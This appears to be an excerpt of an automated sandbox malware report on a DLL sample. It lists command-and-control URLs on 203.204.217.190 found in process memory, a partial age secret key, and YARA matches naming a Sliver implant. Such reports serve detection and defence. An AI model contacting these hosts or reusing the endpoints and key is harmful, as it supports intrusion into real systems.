            Source: rundll32.exe, 00000007.00000003.3671461331.000000000C9E2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/php/php/database/register.html?hm=6708kc6726&o=3450k3059
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/php/php/database/register.php
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/database/php/php/database/register.phphttps://203.204.217.190:8092/data
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2/register.html
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2/register.html?
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2/register.html?WinHttpGetDefaultProxyConfiguration4
            Source: rundll32.exe, 00000006.00000002.4212929021.000000000CC06000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3618422591.000000000CC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2/register.html?f=4d9398139&qc=dl58467309
            Source: rundll32.exe, 00000006.00000002.4212929021.000000000CC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2/register.html?f=4d9398139&qc=dl58467309Mozilla/5.0
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2/register.php
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2/register.phphttps://203.204.217.190:8092/db/oauth2/register.h
            Source: rundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2callback/namespaces/login.html
            Source: rundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589751609.000000000CD26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2callback/namespaces/login.html?
            Source: rundll32.exe, 00000006.00000003.2589751609.000000000CD26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2callback/namespaces/login.html?AGE-SECRET-KEY-1M74AHG87SZUEJ8T
            Source: rundll32.exe, 00000006.00000003.2588799885.000000000CDDE000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2540738785.000000000D006000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2callback/namespaces/login.html?ht=633798h47&q=3n750q0253
            Source: rundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2callback/namespaces/login.php
            Source: rundll32.exe, 00000006.00000002.4219849494.000000000CDAA000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589121437.000000000CDAA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/db/oauth2callback/namespaces/login.phphttps://203.204.217.190:8092/db/o
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/j3
            Source: rundll32.exe, 00000008.00000003.2451552262.000000000CEFA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth/oauth2callback/db/oauth2callback/api/oauth2/database/samples.html
            Source: rundll32.exe, 00000008.00000003.2451552262.000000000CEFA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth/oauth2callback/db/oauth2callback/api/oauth2/database/samples.php
            Source: rundll32.exe, 00000008.00000003.2451552262.000000000CEFA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth/oauth2callback/db/oauth2callback/api/oauth2/database/samples.phph
            Source: regsvr32.exe, 00000004.00000002.4211857579.000000000CC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.html
            Source: regsvr32.exe, 00000004.00000002.4211857579.000000000CC20000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3997562902.000000000CD26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.html?
            Source: regsvr32.exe, 00000004.00000003.3997562902.000000000CD26000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.html?bytes.Buffer:
            Source: regsvr32.exe, 00000004.00000003.3998918249.000000000CC22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.html?o=6504532m6&vm=p58467309
            Source: regsvr32.exe, 00000004.00000003.3998918249.000000000CC22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.html?o=6504532m6&vm=p58467309https://2
            Source: regsvr32.exe, 00000004.00000002.4211857579.000000000CC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.php
            Source: regsvr32.exe, 00000004.00000002.4211857579.000000000CC20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/db/oauth2/php/api.phphttps://203.204.217.190:8092/oauth2
            Source: rundll32.exe, 00000005.00000003.3834789569.000000000CDA2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html
            Source: rundll32.exe, 00000005.00000003.3834789569.000000000CDA2000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4219138978.000000000CD24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html?
            Source: rundll32.exe, 00000005.00000002.4219138978.000000000CD24000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html?AGE-SECRET-KEY-1M74AHG87SZUE
            Source: rundll32.exe, 00000005.00000003.3834534105.000000000CDD6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.html?d=d74442283&la=63379h847
            Source: rundll32.exe, 00000005.00000003.3834789569.000000000CDA2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.php
            Source: rundll32.exe, 00000005.00000003.3834789569.000000000CDA2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/oauth2callback/oauth2callback/sign-up.phphttps://203.204.217.190:8092/o
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C814000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/php/signin.html
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C818000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/php/signin.html?
            Source: loaddll32.exe, 00000001.00000003.3285571702.000000000A196000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4220677081.000000000A198000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/register.html
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/register.html?
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/register.html?H
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A1A2000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A1A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/register.html?WinHttpGetDefaultProxyConfiguration
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4212338833.000000000A006000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/register.html?_=y529553t55&ar=67086i726
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/register.html?_=y529553t55&ar=67086i726Mozilla/5.0
            Source: loaddll32.exe, 00000001.00000002.4212338833.000000000A006000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/register.html?_=y529553t55&ar=67086i726http://203.204.217.190:8092/oaut
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/register.php
            Source: loaddll32.exe, 00000001.00000002.4220764521.000000000A19C000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285464830.000000000A19A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092/register.php.
            Source: rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:80925
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092;0
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092B0
            Source: rundll32.exe, 00000006.00000003.3618422591.000000000CC1A000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2663738732.000000000CC1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092Content-Transfer-EncodingIf-Modified-SinceFri
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092Content-Transfer-Encodinghttps://203.204.217.190:8092WinHttpGetDefaultPr
            Source: rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092IRED
            Source: regsvr32.exe, 00000004.00000002.4211857579.000000000CC06000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3835679098.000000000CD04000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4216612761.000000000CC80000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2663104353.000000000CCF6000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4220443970.000000000CCF6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092Mozilla/5.0
            Source: loaddll32.exe, 00000001.00000002.4209755047.0000000001145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092NG
            Source: regsvr32.exe, 00000004.00000002.4213969543.000000000CC8E000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3998388511.000000000CC8E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092WinHttpGetDefaultProxyConfigurat
            Source: rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092_=82918870&eu=584673u09http://203.204.217.190:8092/
            Source: loaddll32.exe, 00000001.00000003.3285588693.000000000A188000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092_=y529553t55&ar=67086i726
            Source: rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092ab1c2d3e4f5g6h7j8k9m0npqrtuvwxyzf=4d9398139&qc=dl58467309https://203.204
            Source: rundll32.exe, 00000006.00000002.4214808976.000000000CCA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092cannot
            Source: rundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092d=d74442283&la=63379h847mtls://203.204.217.190:8082S
            Source: regsvr32.exe, 00000004.00000002.4213969543.000000000CC8E000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.3998388511.000000000CC8E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092e=97374091&sa=63y379847
            Source: rundll32.exe, 00000005.00000002.4211265707.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092h
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092hm=6708kc6726&o=3450k3059
            Source: rundll32.exe, 00000006.00000003.2588879689.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4221106121.000000000CDC8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092ht=633798h47&q=3n750q0253SetupDiSetSelectedDeviceSetupUninstallOEMInfWCo
            Source: loaddll32.exe, 00000001.00000002.4214235667.000000000A05A000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.4221656723.000000000CE04000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092http://203.204.217.190:8092
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4219372703.000000000CD62000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2589492198.000000000CD62000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3671523760.000000000C9CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092http://203.204.217.190:8092http://203.204.217.190:8092WinHttpGetDefaultP
            Source: regsvr32.exe, 00000004.00000002.4222371334.000000000CE6A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092http://203.204.217.190:8092mtls://203.204.217.190:8082https://203.204.21
            Source: loaddll32.exe, 00000001.00000002.4215361930.000000000A082000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092/api/namespaces/login.html?r=3772_4761&so=58
            Source: rundll32.exe, 00000006.00000002.4212929021.000000000CC06000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3618422591.000000000CC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092/db/oauth2/register.html?f=4d9398139&qc=dl58
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.3285588693.000000000A188000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4221007051.000000000CD66000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4214531173.000000000C8B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfigurat
            Source: rundll32.exe, 00000006.00000003.2588879689.000000000CDC8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfigurata
            Source: rundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratc
            Source: regsvr32.exe, 00000004.00000003.3998918249.000000000CC1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092https://203.204.217.190:8092WinHttpGetDefaultProxyConfiguratn
            Source: loaddll32.exe, 00000001.00000003.3286610660.000000000A088000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4215361930.000000000A088000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3834672492.000000000CDC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2588879689.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4221106121.000000000CDC8000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2662917416.000000000CD22000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4221030380.000000000CD22000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092mtls://203.204.217.190:8082
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C81A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092mtls://203.204.217.190:8082stream.Writer
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092mtls://203.204.217.190:8082t
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092n=56_849732&pi=58467309
            Source: regsvr32.exe, 00000004.00000003.3998918249.000000000CC1A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092o=6504532m6&vm=p58467309
            Source: loaddll32.exe, 00000001.00000002.4209755047.0000000001145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092pG
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092q3
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092r=3772_4761&so=584673b09/
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C81A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092resource
            Source: rundll32.exe, 00000005.00000003.3836232325.000000000CC16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092same
            Source: rundll32.exe, 00000006.00000002.4221106121.000000000CDC8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://203.204.217.190:8092urathttps://203.204.217.190:8092
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C85A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://58467309hpsignin.phpphp/signin.php
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://HTTP/1.1t
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://HTTP/1.1tUser-AgeUser-AgentUser-Agentn=unixgramn=56_849732&pi=ConnectionConnectionConnection
            Source: rundll32.exe, 00000005.00000002.4219138978.000000000CD30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://_=82918870&eu=HTTP/1.1tUser-Age_=User-AgentUser-Agent_=82918870&eu=ConnectionConnectionConne
            Source: loaddll32.exe, 00000001.00000003.3284494679.000000000A2B4000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4223687019.000000000A2B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://_=y529553t55&ar=HTTP/1.1t
            Source: loaddll32.exe, 00000001.00000003.3284494679.000000000A2B4000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.4223687019.000000000A2B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://_=y529553t55&ar=HTTP/1.1tUser-Age_=User-AgentUser-Agent_=y529553t55&ar=ConnectionConnectionC
            Source: rundll32.exe, 00000008.00000003.2663104353.000000000CD0E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4220443970.000000000CD0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cr=67086lp726&o=HTTP/1.1t
            Source: rundll32.exe, 00000008.00000003.2663104353.000000000CD0E000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.4220443970.000000000CD0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cr=67086lp726&o=HTTP/1.1tUser-Agecr=User-AgentUser-Agentcr=67086lp726&o=ConnectionConnection
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C85A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cz=n58467o309&m=HTTP/1.1t
            Source: rundll32.exe, 00000007.00000002.4212133165.000000000C85A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cz=n58467o309&m=HTTP/1.1tUser-Agecz=User-AgentUser-Agentcz=n58467o309&m=Connection8Connectio
            Source: rundll32.exe, 00000005.00000002.4222744476.000000000CDE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d=d74442283&la=HTTP/1.1tUser-Aged=User-AgentUser-Agentd=d74442283&la=ConnectionConnectionCon
            Source: regsvr32.exe, 00000004.00000002.4213969543.000000000CC96000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://e=97374091&sa=HTTP/1.1tUser-Agee=User-AgentUser-Agente=97374091&sa=Connection8ConnectionConn
            Source: rundll32.exe, 00000006.00000002.4217009815.000000000CD0A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://f=4d9398139&qc=HTTP/1.1tno
            Source: rundll32.exe, 00000007.00000002.4223588113.000000000CA74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hm=6708kc6726&o=HTTP/1.1t
            Source: rundll32.exe, 00000007.00000002.4223588113.000000000CA74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hm=6708kc6726&o=HTTP/1.1tUser-Agehm=User-AgentUser-Agenthm=6708kc6726&o=ConnectionConnection
            Source: rundll32.exe, 00000006.00000003.2588772776.000000000CDE8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ht=633798h47&q=HTTP/1.1tUser-Ageht=User-AgentUser-Agentht=633798h47&q=ConnectionConnectionCo
            Source: regsvr32.exe, 00000004.00000003.3998918249.000000000CC14000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.4211857579.000000000CC14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://o=6504532m6&vm=HTTP/1.1tUser-Ageo=User-AgentUser-Agento=6504532m6&vm=Connection
            Source: loaddll32.exe, 00000001.00000002.4225609264.000000000A484000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://r=3772_4761&so=HTTP/1.1tUser-Ager=User-AgentUser-Agentr=3772_4761&so=Connection8ConnectionCo

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5cPRapVOx6.dll, type: SAMPLEMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 5cPRapVOx6.dll, type: SAMPLEMatched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 6.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 6.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 7.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 7.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 5.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 5.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 1.2.loaddll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 1.2.loaddll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 4.2.regsvr32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 4.2.regsvr32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 8.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 8.2.rundll32.exe.6be00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Sliver implant cross-platform adversary emulation/red team Author: ditekSHen
            Source: 00000001.00000002.4230715500.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000006.00000002.4229493462.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000004.00000002.4229586587.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000007.00000002.4229872481.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000005.00000002.4230484560.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 00000008.00000002.4231392141.000000006CA27000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: loaddll32.exe PID: 7336, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: regsvr32.exe PID: 7472, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 7480, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 7488, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 7624, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTRMatched rule: Multi_Trojan_Bishopsliver_42298c4a Author: unknown
            Source: 5cPRapVOx6.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
            Source: 5cPRapVOx6.dll, type: SAMPLEMatched rule: Multi_Trojan_Bishopsliver_42298c4a reference_sample = 3b45aae401ac64c055982b5f3782a3c4c892bdb9f9a5531657d50c27497c8007, os = multi, severity = x86, creation_date = 2021-10-20, scan_context = file, memory, license = Elastic License v2, threat_name = Multi.Trojan.Bishopsliver, fingerprint = 0734b090ea10abedef4d9ed48d45c834dd5cf8e424886a5be98e484f69c5e12a, id = 42298c4a-fcea-4c5a-b213-32db00e4eb5a, last_modified = 2022-01-14
